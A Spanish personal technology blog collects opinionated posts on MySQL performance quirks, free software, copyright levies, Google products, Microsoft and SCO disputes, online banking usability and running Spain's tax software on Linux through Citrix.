Freedreams

Mysql es una base de datos Open Source fiable y rápida. Ideal para la llamada “Web 2.0″ (o 3.0, no se por qué número vamos ya). Las grandes plataformas web no pueden depender de una base de datos relacional al estilo tradicional. Los datos se encuentran particionados en diferentes tablas, cada tabla casi en su propia granja de servidores. Los conceptos de Foreign Key, integridad referencial, normalización, etc. tan venerados por los diseñadores de bases de datos no tienen sentido. Ninguna base de datos ni máquina puede escalar a los niveles que necesitan las grandes plataformas web.

La responsabilidad sobre la lógica, la gestión de los datos, la gestión de la integridad se desplaza a los frontales, el código de la aplicación, instalado en cientos de servidores, y que por tanto escala casi linealmente frente al cuello de botella de las bases de datos.

Por ello mysql con su sencillez y orientación a la velocidad se posiciona como alternativa interesante, apoyada por sistemas de caché key-value (de nuevo nada relacionales) como Memcached. Incluso existen forks (por importantes divergencias en la forma de llevar el desarrollo) como Drizzle o Maria DB que incluso recortan aún más las funcionalidades para poder avanzar en el camino de la escalabilidad.

Pero MySQL también tiene cosas malas. Como este bug por el que hemos perdido horas y horas de investigación en tuenti. Al cambiar unas tablas de MyISAM a InnoDB empezamos a observar cómo el esclavo migrado se empezaba a retrasar respecto al maestro, totalmente saturado con las consultas y el thread de replicación consumiendo el 100% de uno de los cores.

Un ejemplo lo resume todo:

mysql> SELECT * FROM test WHERE int_field=1 and bigint_field=1;
Empty set (0.00 sec)

	
mysql> SELECT * FROM test WHERE (int_field,bigint_field) IN ((1,1));
Empty set (0.00 sec)
	
mysql> DELETE FROM test WHERE int_field=1 and bingint_field=1;
Query OK, 0 rows affected (0.00 sec)
	
mysql> DELETE FROM test WHERE (int_field,bingint_field) IN ((1,1));
Query OK, 0 rows affected (1.19 sec)
                           ^…………………………….. WTF!!!

El problema de rendimiento ocurre cuando se utiliza la sintaxis IN, sólo si hay dos o más campos en el IN, sólo si al menos uno de los campos es BIGINT. Un conjunto de condiciones cuanto menos curioso. Cambiando la sintaxis de las queries, problema resuelto…

El problema es especialmente notable cuando la tabla es InnoDB. Con MyISAM el cuatro query tarda 0.19sec, mejor, pero un tiempo todavía absurdo comparado con los tiempos de los otros queries. ¡Deberían comportarse todos igual! Definitivamente hay algo roto en los entresijos del servidor para tener un rendimiento tan horrible.

La broma del April Fools Day de Google vuelve a ser de las mejores. Lanzan a CADIE (Cognitive Autoheuristic Distributed-Intelligence Entity) un nuevo empleado de Google basado en la inteligencia artificial. Al parecer, a partir del “estudio de la web social", extrajo los “principios de diseño” y creó su precioso blog. ¡OMG I love pandas!. Cuidado con sus ojos, que parece que ha reunido la crème de la crème de los diseños de My Space XDDD.

La Comisión Federal de Comunicaciones de EEUU (FCC) ha aprobado unánimemente el libre uso, sin licencia, de las bandas de espectro libres entre canales de TV, pese a la férrea oposición y campañas de presión lanzadas por los operadores tradicionales. Únicamente exige que su uso no provoque interferencias en las bandas licenciadas.

Esta decisión puede suponer una revolución en las comunicaciones inalámbricas. Google apostó fuertemente por esta libertad a fin de que el acceso a Internet móvil universal sea una realidad muy pronto.

A partir de ahora, en EEUU estas bandas serán como el WIFI actual: de libre utilización. La ventaja es que el espectro libre y hasta ahora desaprovechado entre los canales de TV es de una frecuencia mucho más baja (30-300Mhz en UHF) que el WIFI (2.4 Ghz) por lo que su propagación es mayor. Con menos antenas se consigue mayor cobertura, y aparecerán muchos proveedores dispuestos a dar acceso a bajo coste en estas bandas.

El presidente de la SGAE nos deja otra de sus perlas en una entrevista de El País:

El canon es agua pasada, no hay quien lo arregle, se paga y ya está, y al que no le guste que se aguante.

Teddy Bautista, presidente de la SGAE

Yo le respondería con su misma medicina, a ver si se entera de una vez por todas, pero me da que para él no le va a valer eso de “y ya está":

El negocio de la distribución de contenidos es agua pasada, no hay quien la arregle, se hunde y ya está, y al que no le guste que se aguante.

Ya está disponible la versión 3 de Firefox, una versión que avanza años luz respecto a la anterior, especialmente en velocidad, consumo de recursos y robustez.

¡Descárgala hoy mismo, y ayuda a batir el récord de descargas en un único día!

Firefox 3 verá la luz el día 17 de junio. Me encanta la fecha elegida… ¡Es el día de mi cumple! ¿Y a que no sabéis cuantos cumplo? 30, ¡Como Firefox 3.0! jeje

Ese día se tratará de batir el record de descargas de un programa en un único día. Así que recuerda, el día 17 visita la web de mozilla o apuntate ya al Día de la Descarga para que te lo recuerden.

Google Reader se me hace ya la herramienta imprescindible para seguir de cerca diversas fuentes de contenidos. Atrás quedó aquella época de tener que visitar diversas webs una tras otra para estar al tanto de las noticias. Los Feeds y la sindicación se encargan de hacernos llegar esos contenidos a una misma plataforma, Google Reader, donde llevar cómodamente el seguimiento. Google Reader permite además destacar contenidos interesantes y añadir etiquetas. Aquellos que marques como “compartir” aparecerán en un feed que puedes compartir con tus amigos. ¿Qué consideras tu importante compartir?

Pero el añadido más reciente es la posibilidad de añadir notas a contenidos de terceros. Ahora puedes aportar valor, hacer comentarios sobre noticias, etc. Una limitación importante era la necesidad de que fueran contenidos sindicados en Google Reader para poder compartirlos. Pero ya no se necesita más. Simplemente con añadir a tus bookmarks Comentar en Google Reader y pulsarlo siempre que quieras, ya puedes comentar cualquier página de Internet.

Por si fuera poco, se pueden añadir textos directamente a tu feed de elementos compartidos. Muy al estilo twitter. La única pega es el no poder definir título de las notas o poder editarlas una vez escritas (aunque puedes borrarlas y volverlas a crear).

El resultado es una página de elementos compartidos como ésta Guille (bisho)’s shared items, que puede sindicarse. Se puede incluso añadir una caja con los contenidos a tu web, como la que muestro a la derecha.

En resumen, Google Reader te permite:

• Llevar seguimiento de tus fuentes de información de forma cómoda y rápida.
• Destacar, clasificar y comentar contenidos de tus feeds para compartirlos con tus amigos.
• Destacar, clasificar y comentar cualquier página, vía el bookmarklet Comentar en Google Reader.
• Escribir notas para compartirlas directamente, como micro-blogging.
• Diferentes modos de ver los elementos compartidos (página web, feed, caja de contenidos para tu web).

Las únicas pegas que encuentro son las ya comentadas: El no poder poner título a las notas y no poder editarlas. Si las corrigen pronto no necesitaré más para comunicarme. A la caja para integrar con otras webs también le falta algo de perfeccionamiento. Ahora que hay elementos con comentarios tiene que dejar de enlazar directamente a los contenidos y poder mostrar las notas de alguna manera. Pero bueno, ¡cosas mínimas para el potencial que ofrece!

La prensa y las unidades de medida que no sean metros siempre se han llevado muy mal.

En este caso El País recoge la noticia “España bate el récord de transmisión de datos por fibra óptica“.

Parece que se ha conseguido transmitir 1 Terabit/segundo por una única fibra. El resto del artículo es para olvidar, empezando por el subtitular: “La Universidad Politécnica de Valencia consigue una velocidad 200 veces superior a una conexión convencional” y continúa “Según han informado hoy fuentes universitarias, este logro tecnológico, comparado con las conexiones actuales, supone incrementar hasta doscientas veces la velocidad de una conexión típica de cinco megabits". 1 Terabit/s entre 200 no son 5 Mbit/s sino 5 Gigabit/s. No se ustedes, pero yo no tengo esa conexión en mi casa.

Y también olvida decir que es en fibras multimodo, ya que en monomodo ya se llega a más de 14Tbps.

xkcd nos desveló hace ya tiempo el nuevo PRNG que se iba a utilizar para OpenSSL en debian:

Si no sabes de qué va esto, aquí tienes información sobre el grave fallo de seguridad. Si has instalado debians/ubuntus o has generado claves SSL/SSH desde 2006/09 puedes estar afectado. En el wiki de debian hay instrucciones de cómo detectar y corregir el problema.

Una vez más Hacienda nos hace la puñeta. Y no, no me estoy refiriendo a los impuestos, necesarios para mantener un estado con servicios públicos, sino a que una vez más el programa de ayuda para la declaración de la renta 2007 sólo está disponible para Windows, lo cual nos excluye y discrimina a muchos.

El año pasado probé con wine, pero daba innumerables problemas, y al final, dándoles la vara por email, conseguí enterarme de la alternativa que proponen para los descarriados: utilizar un cliente Citrix para conectar con unos servidores windoze, que hospedan la aplicación y guardan su resultado en nuestro ordenador como si fuera un programa local.

Como las instrucciones son un tanto crípticas, resumo aquí los pasos que hay que realizar para hacer la renta 2007 desde linux o mac:

1. Lo primero es descargarse el cliente citrix para nuestro sistema operativo, linux o mac. No recomiendo descargarlo en español, que es muy antigua.
2. Para instalar en linux yo descargué el tar. En el tar hay un fichero setupwfc que debemos ejecutar, y que instala el cliente citrix en el directorio que indiquemos. Se puede hacer como usuario normal e instalar en el home del usuario, algo que yo prefiero, para que no instale basura en el resto del sistema de ficheros.
3. En linux es necesario además instalar las librerías openmotif. En Debian/Ubuntu basta ejecutar sudo apt-get install libmotif3. Puede que necesites tener habilitado el repositorio “multiverse”.
4. Después hay que ejecutar la configuración ./wfcmgr y en Tools->Settings->Drive Mapping mapear la unidad Z a un directorio local donde se guardará la declaración. Aseguraos de habilitar la unidad así como de asignar permisos de lectura y escritura:

En el espartano y horrible portal de programas de ayuda (bastante difícil de encontrar, por cierto) podéis encontrar algo más de información sobre configuración y algunos problemas frecuentes.

Para lanzar el cliente citrix se puede pulsar en el botón “Ejecución con Cliente Nativo” del portal de programas de ayuda. A mi me ha dado problemas lanzarlo directamente desde el navegador, por lo que si lo preferís podéis descargar éste fichero de configuración y lanzarlo directamente con: ./wfica -file renta2007.ica.

Otra recomendación es que antes de comenzar os descarguéis los datos fiscales de 2007 y los guardéis en la unidad compartida Z. Al hacer una nueva declaración y rellenar unos cuantos datos, da la opción de importar los datos fiscales desde un fichero lo que ahorra picar muchos datos. Una vez pasas a la declaración, ya no puedes volver a importar esos datos.

Recordad también guardar la declaración y cerrar el programa de ayuda, ya que es cuando se escriben los datos a la unidad Z que está en nuestro ordenador. Si perdemos la conexión antes de cerrar el programa de ayuda, o cerramos directamente el cliente citrix se pierden los datos.

Bueno, mucha suerte, que os salga a devolver y recordad que es mejor no dejarlo para el final :)

Y a ver si para el año que viene hacen de una vez una aplicación Open Source y multiplataforma, como debería ser, sin tener que recurrir a chapuzas como un cliente citrix, que, además, es software comercial que le debe costar un buen pico a Hacienda. En Brasil, por ejemplo, el programa para calcular el IRPF ya es Software Libre.

Microsoft ha conseguido lo que parecía imposible, que el ISO apruebe su formato de documentos xml “Open XML” como estándar ISO, cuando:

• Ya existe otro estándar para el mismo propósito.
• Por la vía rápida, sin apenas discusión.
• Para una definición de 6.000 páginas, ¡leen rápido!
• Existen muchas pegas respecto a la definición clara y sin ambigüedades de la propuesta.
• Existen aspectos no definidos o incluidos en la propuesta.
• En la primera votación de septiembre se rechazó con 2.300 comentarios y observaciones sobre la propuesta (a pesar de no haberse sometido a un análisis exhaustivo).

Lo ha conseguido a base de hacer presión sobre infinidad de estados, que ministros impusieran su opinión al comité de estandarización del país, conseguir que empresas o individuos enviaran cartas pre-escritas de apoyo a su estándar, conseguir la presencia en los comités de partners de Microsoft que convirtieran el voto de negativo en positivo y conseguir que numerosos países se muestren repentinamente interesados en la estandarización y en tener voto en la comisión, a pesar de tener poco desarrollo tecnológico en la administración como por ejemplo Azerbayán, Côte-d’Ivoire, Sri Lanka…

Hay un completo informe sobre las irregularidades durante el proceso en la web de OpenXML.info, además de otra información sobre el infecto estándar que el ISO acaba de aprobar. FFII también denuncia cómo “el ISO ha sido controlado por Microsoft“.

Es terrible ver como el poder y el dinero pueden corromper a uno de los organismos de estandarización más serios y conocidos del mundo. Flaco favor hacen a la libertad de intercomunicación que garantizan los estándares. A partir de ahora el ISO en vez de International Organization for Standardization será el acrónimo de “International Organization for Swindle”

Microsoft se lanza de nuevo a la conquista del único espacio que aún se le resiste (el sector de juegos por primera vez dio beneficios en el último cuatrimestre). Se lanza a por Internet.

MS cometió un error muy grave al despreciar el futuro de Internet en sus inicios. Al darse cuenta de su importancia intentó competir con su propia red, un fracaso estrepitoso, para luego lanzarse de lleno a intentar ganar el terreno perdido. Regalar el navegador Explorer e integrarlo con el sistema operativo logró una de sus pocas victorias, con juicio antimonopolio incluído. El enorme retraso de la versión 7, por su confianza en haber ganado, está provocando de nuevo competencia en ese sector, aunque aún está lejos de considerarse amenazado. El resto de “victorias” en Internet han sido adquisiciones, pero no han logrado una posición holgada.

Ahora lo intentan de nuevo comprando a Yahoo, una de las empresas más antiguas del sector, con amplia experiencia, pero que está de capa caída. Habrá que ver si la OPA prospera, pero planteará muchas dificultades. Por ejemplo Hotmail ha pasado a ser un bodrio insoportable. Harán lo mismo con los servicios exitosos de Yahoo? Flickr se convertirá en ¿MS Live Photo Album de colores azules y passport accounts? Ufff… miedo da. Por una parte MS y Yahoo se complementan. La pasta de una y su dominio del escritorio de MS y el enfoque de Internet de Yahoo, pero por otra parte la filosofía de empresa no tiene nada que ver. Si MS trata de meterse muy de lleno en Yahoo, no mantenerla independiente, puede provocar una fuerte huída de cerebros… Que Google estaría muy dispuesta a reclutar. Además el importe de la operación podría dejar hasta débil a MS. Oferta 42.000 millones de dólares, lo que dejaría seco su fondo en efectivo de 19.000 millones. Tras la noticia Yahoo sube en el mercado y MS baja.

Pero lo más preocupante es que Yahoo ya rechazó una oferta de compra el año pasado, un momento en el que valía mucho más en bolsa y probablemente la cuantía ofrecida era mayor. Si Yahoo lo rechazó sería porque no veía clara la idea de integración de MS, no sólo por el dinero. Ahora por la fuerza del dinero puede que lo logre, y veremos qué queda de Yahoo, una de las pioneras de Internet.

Soy un sufrido cliente de OpenBank. Antes tenían una web espartana pero funcional, sin demasiado javascript pero rápida y perfectamente funcional en todos los navegadores. Incluso con el navegador en modo texto links he llegado a utilizarla.

Pero recientemente han lanzado una nueva versión, bien aderezada de javascript y bazofia AJAX. Digo bazofia porque cuando no tienes ni puta idea, suele ser mejor que no lo utilices.

Para empezar, tras hacer login, la página con las operaciones requiere:

• 42 peticiones (más alguna que no se cuenta, porque hay una redirección de por medio)
• 799Kbytes (La mayoría en librerías JS que ni siquiera están optimizadas)
• 18,43 segs. (Si, en una conexión muy buena y un Firefox con el número de peticiones concurrentes aumentado, que en uno normal iría más lento)

¿Ustedes lo ven normal? Yo desde luego, no…

Luego utilizan javascript hasta para mear. Hay páginas impresas por javascript “on the fly". Programar en el servidor debe ser muy complicado o requerir muchos recursos en el servidor, así que se imprime un buen trozo de JS con document.write… Si señor, eso es ser profesional. Los enlaces como todo el mundo sabe existen para llamar exclusivamente a funciones javascript. Han leído que CSS es lo más “modelno", y lo usan mucho (más de 10 ficheros CSS cada vez que cambias de página), pero las invocan desde el body del documento HTML, no desde el header. Por supuesto todo son frames e iframes, etc. Curiosamente han oído que lo cool es utilizar divs, así que nada, ellos meten divs por todos lados, incluso en celdas de tablas. Hay que ser cool.

Y bueno, sufriendo mucho todo esto lo podría aguantar… Si no fuera porque no funciona bien con Firefox… Y me he vuelto loco con el Firebug. No hay errores serios, pero no se ven las pestañas para hacer operaciones. Pero he logrado cargar alguna página y hacer transferencias cortando y pegando urls del código javascript.

En seguida empecé a escribirles, indignado por el problema de acceso y la ínfima calidad del desarrollo.

Afortunadamente, tras un cambio de esta importancia, OpenBank sabe que tener un buen equipo de soporte para atender las nuevas dudas de uso. E incluso responden a los emails que les escribía poniéndoles a parir.

Los emails respuesta siempre constan de las siguientes partes:

• Sentido agradecimiento:

  Muchas gracias por su mensaje:

  Incluso cuando les pongo a parir me lo agradecen, que majos…

• Disculpas por la demora:

  Debido a una incidencia puntual no hemos recibido su mensaje hasta el
  día de hoy. Le pedimos disculpas por las molestias que esta situación
  haya podido ocasionarle.

  Que casualidad que TODOS mis mensajes estén afectados por la misma incidencia puntual. Si tienen mucho trabajo y no dan abasto, simplemente pidan disculpas por la demora, no me suelten paridas técnicas para exculparse, que no somos idiotas.

• Más agradecimientos y algún tipo de excusa sobre lo mucho que se esfuerzan en mejorar:

  Le agradecemos que nos transmita su opinión acerca de la web de
  Openbank, y le pedimos disculpas unavez más por las molestias que le
  estamos ocasionando. Nuestro objetivo es ir ampliando los productos y
  servicios financieros, manteniendo nuestro compromiso de calidad y
  atención al cliente.

  Realmente inspirador… Además van cambiando el párrafo y todo de vez en cuando.

• La brillante solución al problema (siempre sin leerse mi problema, que precisamente es que no funciona con navegadores no-explorer):

  En este sentido nosotros le informamos que la web de Openbank está
  optimizada para una resolución de 1024 * 768 píxeles, con Windows y
  con los navegadores Microsoft Internet Explorer 5.0 o superior /
  Netscape 6.2 o superior.
  Si no dispone de alguna de estas versiones puede descargárselas
  gratuitamente en la página web de netscape y en la de microsoft.
  Si utiliza otros sistemas operativos (Mac, Linux), recomendamos que
  los utilice con Mozilla Firefox.

  Muy bien… Ya que Firefox les digo que no funciona, probaré la web de microsoft a ver si ya está explorer para Ubuntu… (y ie4linux muere al cargar openbank, por si alguien lo sugiere –y sin entrar a que no debería utilizarse para navegar, sólo para desarrollo–.)

• Despedida, saludo y otros formalismos…

Pero por fin, tras mucho insistir, casi 10 mails y al final casi gritarles que se lean los emails que les envían en vez de contestar respuestas predefinidas… me envían “la solución”^TM. Resulta que el frame con los enlaces se sale del área visible. Me envían un PDF diciendo que pulse en una zona, y pulse “Avance página” para mover el frame hacia abajo y… milagro, ¡aparecen los enlaces para operar!

Sobre el arreglo, ya que saben del problema podrían solucionarlo, en vez de enviar unas instrucciones así de cutres al usuario (a mí al menos me daría vergüenza). Pero aún hay más. El que haya generado el PDF además de cutre es un “friki” gracioso. El teclado de ejemplo que muestra de ejemplo es un Das Keyboard, como todo buen friki rápidamente reconocerá… No sé, a lo mejor es un guiño entre frikis, y me río, pero si es una bromita de los que crearon la mierda de aplicación web, ya me toca un poco las narices su falta de profesionalidad. Aquí os dejo, con las soluciones avanzadas de OpenBank, con Das Keyboard:

Y por cierto, ahora logro pulsar en la pestaña “Operativa", sí, pero cuando lo hago se queda todo en blanco. ¿Tendré que hacer Avance de página en algún otro frame que no veo? ¿sugerencias?

Update: Me acabo de enterar de que no todos los usuarios ven la web nueva al acceder. Algunos aún entran en la vieja, así que a lo mejor simplemente utilizan a algunos pardillos (entre los que me incluyo) como cobayas de laboratorio para su nueva y flamante web. ¡Suerte y que no os migren muy pronto!

A los que me conocen no les sorprenderá nada. Pero lo digo o exploto.

En el curro me está tocando reinstalar windozes que estaban infestados de virus. Toda la fauna y flora existente en Internet estaba metida en su disco duro.

Y menuda experiencia. Son windows 2000. Reinicia con cada cambio de IP, con cada actualización, y el proceso mas tortuoso que puedas imaginar. Bufff… Resumo la experiencia:

El windows update me dice que necesito el service pack nosequé para que funcione. Caray… ¿no es windows update el que debería instalarlo? Al menos me pone un enlace a una página donde bajarlo. Lo sigo y empieza a bajar, 100+ megas. A instalar… ah, que está en inglés y se necesita en castellano. ¿Y no podría poner el enlace al sitio adecuado? No. A buscar… El buscador de la web de MS es PURA MIERDA. Las páginas han caducado. 100 redirecciones. Al final Google al rescate. ¡Ahí está! Lo bajo y lo instalo. Reinicia, por supuesto. A ver si ahora puedo utiliza windows update… ¡NO! Que necesito al menos explorer 5.5. Sigo el enlace, y va a una página sobre explorer 7, que no me deja bajar nada porque no existe para windows 2000. ¿Y las versiones anteriores? ¡desaparecidas! Google al rescate y un par de páginas de MS inexistentes más tarde logro encontrar el Explorer 6. Bajar, instalar, reiniciar. Ahora si, Windows Update tira. 63 actualizaciones, que bien, Y el service pack debe ser para actualizar los fondos de escritorio, claro… 2 horas y media más tarde acaba y… ¡reiniciar, claro!

Ahora es el turno de los programas… ¡sigth! porqué no tendrá esto un apt-get… Un programa para unzipear (parece mentira que esto no lo tenga windows), un antivirus, el firefox, el thunderbird, un editor de texto decente, OpenOffice… Arf… y todo venga a navegar para bajar cada cosa. Odio windows. De verdad. Lo Odio.

Pero ya saben… Windows es “fácil"…

El gobierno de la SGAE acaba de publica en el BOE (que se distribuye en DVDs con canon) los nuevos elementos añadidos a la lista de bienes gravados con canon. El gobierno, que subió al poder al comprar en las elecciones la mayoría absoluta gracias a sus ingresos multimillonarios, es la decimoquinta vez que amplía la lista de bienes sujetos a gravámen.

Hoy se añaden:

• Sillones/sillas: 30/15 € (Se utilizan para escuchar en ellos música y ver películas)
• Metro y Bus: 0,30€ por viaje (Muchos viajeros escuchan la música de otros, lo cual debería gravarse)
• Gafas y lentillas: 5 € (Se utilizan para ver mejor las películas)
• Audífonos: 4 € (Se utilizan para escuchar música)
• El aire que respiras 1 € / hora (Transmite las ondas sonoras, por lo que debe ser gravado como otros medios: internet, teléfono, tv, radio…)

Ya en el presente, que se pretenda cobrar canon a discos duros extraíbles y móviles por sus cutre-melodías, me parece tan surrealista y bochornoso como la situación hipotética que describo arriba. Viva la Europa del canon. La mercantilización de la cultura. Y para el enriquecimiento de unos pocos, claro.

Leo en Groklaw:

The court concludes that Novell is the owner of the UNIX and UnixWare Copyrights.

Novel, no SCO, es el poseedor de los copyrights de UNIX y UnixWare, un duro revés a los intereses de SCO, que debe así dinero a Novel de lo que intentó cobrar por las “licencias de linux” vendidas. Sin embargo sigue sin darse por vencida, ha publicado un comunicado a los dos días, listando todo lo que no le ha sido denegado (aún) como un éxito. La prensa especializada no cae en el engaño y Forbes titula Big ‘No’ To SCO.

La decisión no sólo afecta a su juicio contra Novel, sino que su caso contra IBM por ceder su propiedad intelectual a Linux sin autorización, queda ahora gravemente dañado. Sólo podría pedir derechos sobre lo desarrollado en exclusiva por SCO tras obtener una licencia de UNIX, no por la propiedad intelectual de UNIX en sí misma. Si ya tenía bastante complicado el caso contra IBM, habiendo aportado sólo ínfimas evidencias de código sin valor, a partir de ahora será aún peor.

Veremos cómo evolucionan las acciones hoy tras el fin de semana, pero todo apunta a un descalabro que podría superar el 60% del valor de mercado. [Actualización: se estrena con una caída del 70%]

Paralelamente, un nuevo éxito del Software Libre, se ha denegado la aprobación del Open XML de MS como estándar ISO por la vía rápida, como pedía Microsoft (por la mínima eso sí). De aceptarse, el horrible formato propuesto por Microsoft hubiera podido convertirse en estándar sin apenas discusión ni análisis. Con las indudables pegas que plantea, y aprobándose de la forma tradicional es muy probable que sea denegado, o que se exijan muchos cambios para su aprobación.

Así que al menos hasta dentro de muuuchos meses, Open Document, el formato impulsado por el mundo del Software Libre, es el único estandar ISO para aplicaciones ofimáticas.

Actualización: Se confirma el batacazo de SCO. La gráfica lo resume todo. En una jornada con 50 veces más movimiento de títulos de lo habitual, se ha hundido por debajo de dos tercios de su anterior valoración.

¡Ayer estuve en el evento para programadores organizado por Google, el Google Developer Day 2007!

La verdad es que fue estupendo, me lo pasé muy bien y la organización fue muy cuidada, con regalitos, ambiente estupendo, comida excelente…

El problema más gordo, increíble pero cierto, fue la red inalámbrica. Empezando porque inicialmente sólo habían previsto una red, y que encima estaba dando IPs en una res máscara 255.255.255.0. Éramos 500, el 95% con portátiles, así que las IPs se acabaron en seguida. Tampoco tenían una red separada y protegida para los ponentes, con lo que muchas charlas se vieron empañadas por dificultades de acceso. Muy rápidamente añadieron 6 redes más, y más o menos empezó todo a funcionar, pero con cortes intermitentes y una velocidad “ante-adsl-iana".

Mi taller sobre GData tampoco fue especialmente bueno, ya que para linux el entorno eclipse que facilitaron no tenía todos los plugins necesarios, y perdimos mucho tiempo en arreglar esas cosas, y el tiempo restante fue demasiado poco para poder hacer el taller normalmente. Además el taller era casi calcado a los ejemplos prácticos que te proponen en la documentación, nada nuevo. Yo esperaba algo más de nivel, algo más creativo que una práctica medio guiada. Oí en cambio que el taller de Google Maps estuvo mucho mejor.

Hablaron de los Mapplets, que permiten hacer mashups con mapas (con patata güebdospuntocero en la boca) de forma fácil, sin programar. En general a los mapas y a la información geolocalizada le dieron mucha importancia. Es muy importante poder relacionar la información con la localización, el 80% de la información mundial va asociada a una localización, pero hasta ahora las empresas sólo se habían centrado en los usos más importantes (búsqueda de calles y rutas), pero los nichos suponen en conjunto mucho más valor añadido. Las apis de Google Maps están siendo un éxito sin precedentes en este sentido, permitiendo a desarrolladores externos desarrollar aplicaciones para nichos: Mapas con rutas de bicicleta, compras de pisos, etc, etc, etc…

También hubo una aburrida (para mí) charla sobre los Gadgets. Las cositas esas que se pueden embeber en la web principal de Google y en tu página web, con un reloj y todo tipo de chorradillas. Yo no le veo mucha utilidad, pero entre adolescentes aprendices de frikis poder poner un reloj rosa parece que hace furor, y para empresas grandes hacer cacharros de estos con información les es interesante porque les da millones de visitas gratis.

También han lanzado el Google Mashup Editor, competidor de Yahoo Pipes, aunque parece que va más orientado a desarrolladores, no va a ser una herramienta gráfica, para el usuario final. El proyecto aún es beta, y no dejan apuntarse. Una lástima. Intentaré utilizar una de las tarjetas que conseguí ayer a ver si me cuelan en la beta.

Pero lo que más me gustó fue Google Gears, un proyecto que presentaron ayer mismo, y que permite desarrollar aplicaciones que funcionan offline. Es Open Source (ayer una de las consas en las que más hicieron hincapié es en la necesidad de usar Open Source para impulsar estándares), funciona en los principales navegadores y es multiplataforma. Consiste en una capa intermedia que intercepta las llamadas al servidor y es capaz de responderlas si no hay conexión. Se programa en javascript (pero corre en un thread aparte, con lo que el navegador no se resiente ni se queda bloqueado como con los scripts malignos que se ejecutan habitualmente en las webs) y tiene una base de datos SQLite. El funcionamiento parece sencillo, el código es muy asequible, y se apoya en un fichero que describe que recursos (imágenes, scripts, css) se debe bajar el navegador para pasar a modo offline. Esto puede incluir un JSON con los items del TODO, que quieres que estén accesibles offline, por ejemplo. Estoy deseando cacharrear con la plataforma.

Si quieres probarlo, lo puedes instalar y ver demos desde la web de Google Gears, pero la mejor prueba posible es el nuevo Google Reader, que ya está adaptado y permite consultar offline los últimos 2000 items de tus feeds. ¡¡¡Busca el icono arriba a la derecha!!!

Por cierto, que hablé con el desarrollador del Google Reader para darle las gracias por la estupenda aplicación, y preguntarle por la búsqueda, que piensan añadir en breve, y sugerirles la necesidad de filtrar duplicados (por ejemplo si sindicas dos planetas en la misma carpeta, y un blog está en los dos planetas, que sus noticias no salgan duplicadas). Ya estaba al tanto del problema, y me dijo que en cuanto esté la búsqueda, eso ya será posible.

Para terminar, iban a dar una charla los directivos desde Mountain View, pero parece que estaban muy liados comprando empresas -la española Panoramio, para más detalles-, así que nos quedamos con las ganas. Para acabar invitaba a barra libre y canapés, con musiquilla y un ambiente muy agradable.

Finalmente, Google tiró la casa por la ventana: Nos iba a llevar a cada uno a casa en helicóptero, pero ¿por qué llevarnos si puede regalarnos uno exclusivo para cada uno? Aquí tenéis mi chupi helicóptero (me muero por probarlo, pero llegué a las mil a casa):

Ya hace poco Microsoft insinuó que el Software Libre, y en particular Linux, violaba algunas de sus patentes y copyrights.

Hoy parece que anuncia más detalles al respecto. Son 235 patentes, y MS podría exigir el pago de royalties por su uso y distribución. Si lo lograra, el Software Libre dejaría de ser libre.

Pese a lo grave de la amenaza, está el caso de SCO, que ha demostrado la fortaleza de los argumentos contra copia y patentes cuando se dispone de un equipo decente de abogados. SCO está cerca de la quiebra, con sus acciones cotizando por debajo de 1 dólar y sin apenas reservas de efectivo para pagar a sus abogados. Con MS por desgracia no se le van a acabar las reservas de efectivo, ni su negocio se vendrá al traste por meterse en juicios, pero Groklaw analiza las debilidades del caso, y se ven que son considerables. Entre ellas una de las más graciosas es que se puede considerar a MS distribuidora de Linux bajo la GPL gracias a su acuerdo con Suse, lo que pone sus patentes a la altura del betún.

En fin, que realmente no creo que MS siga adelante con la loca idea de tratar de defender sus patentes. El Software Libre su única excusa para alegar que no es monopolio en sus continuas disputas con la UE, y muchos de los usuarios a los que tendría que llevar a jucio son usuarios también de sus sistemas. Simplemente creo que se trata de una estrategia de confusión, llevada a entorpecer la creciente adopción de Linux a través de dudas y campañas de miedo, pero poco más. Habrá que estar atentos…

La normativa europea va a forzar el pago de un canon por cada préstamo en las bibliotecas públicas. Se trata, una vez más, de un mal entendido concepto de protección intelectual. Europa, gracias a las presiones de los grupos propietarios de los derechos, convierte en negocio puro y duro hasta el símbolo más básico de la cultura: los libros.

Tanto es así, que hasta medios generalistas, tradicionalmente defensores de los derechos de autor, plantan ahora discursos críticos de lo más sorprendentes.

Me da exactamente igual que sean 20 céntimos y no los paguen los usuarios. Acumulados, pueden suponer un libro menos en las bibliotecas. Hasta ahora España se había resistido a aplicar la medida europea, y se nos ha condenado a multas por no acatar la normativa. Ahora nos plegamos a los deseos de Europa y los editores, pero algunos protestan. La plataforma no al prestamo de pago está recogiendo adhesiones de escritores que no desean que sus libros paguen canon, profesores, bibliotecas y usuarios. ¡Dedícale 5 minutos al asunto!

En estos días esta produciéndose una avalancha de informaciones sobre este asunto que afecta a la libre circulación del conocimiento y la cultura.

Un estudio empírico demostraba la escasa relación entre la piratería y el descenso de ventas de discos. Del descenso de 80 millones (~10%) entre 2001-2002 el P2P sería responsable de menos de 6 millones (0.7% de las ventas), lejos de los billones en pérdidas en que cifran las entidades pro-copyright como la RIAA o la SGAE:

we can reject a null that P2P caused a sales decline greater than 24.1 million albums. For reference, the music industry sold 803 million CDs in 2002, which was a loss of 80 million from the previous year. Our estimates become more precise if we relax the assumption that file sharing affects only contemporaneous sales and if we allow for growth in the number of file sharers. For example, the scaled GMM models in table 9 reject a null of losses greater than 6.6 million. […] While file sharers downloaded billions of files in 2002, the consequences for the industry amounted to no more than 0.7 percent of sales.

Los motivos del descenso se deben buscar pues en otros factores. Entre los que propone el artículo está la reducción de stock en las tiendas, sobre todo para la venta por internet (y las cifras son para discos distribuidos, incluyendo los stock de tiendas, no ventas reales que se han reducido mucho menos); que ya finalizó el periodo de substitucion de formatos antiguos por el CD, con lo que las compras ahora serán menores con el mercado de los clásicos ya saturado; o que ahora los CDs compiten con DVDs y otras formas de entretenimiento en casa (globalmente el mercado del entretenimiento aumenta).

Apple pide a través de una reflexión de Jobs que se suprima la protección digital (DRM) a la que está sujeta la distribución de música vía su plataforma iTunes, que tiene que competir contra otros formatos no protegidos como los CDs. Al parecer sólo el 3% de la música de los iPod se compra en su tienda, probablemente por la incomodidad que supone para muchos el DRM y el no poder escuchar la música por la que paga en otros equipos. Las discográficas responden que lo que puede hacer Jobs es compartir la protección, en vez de eliminarla.

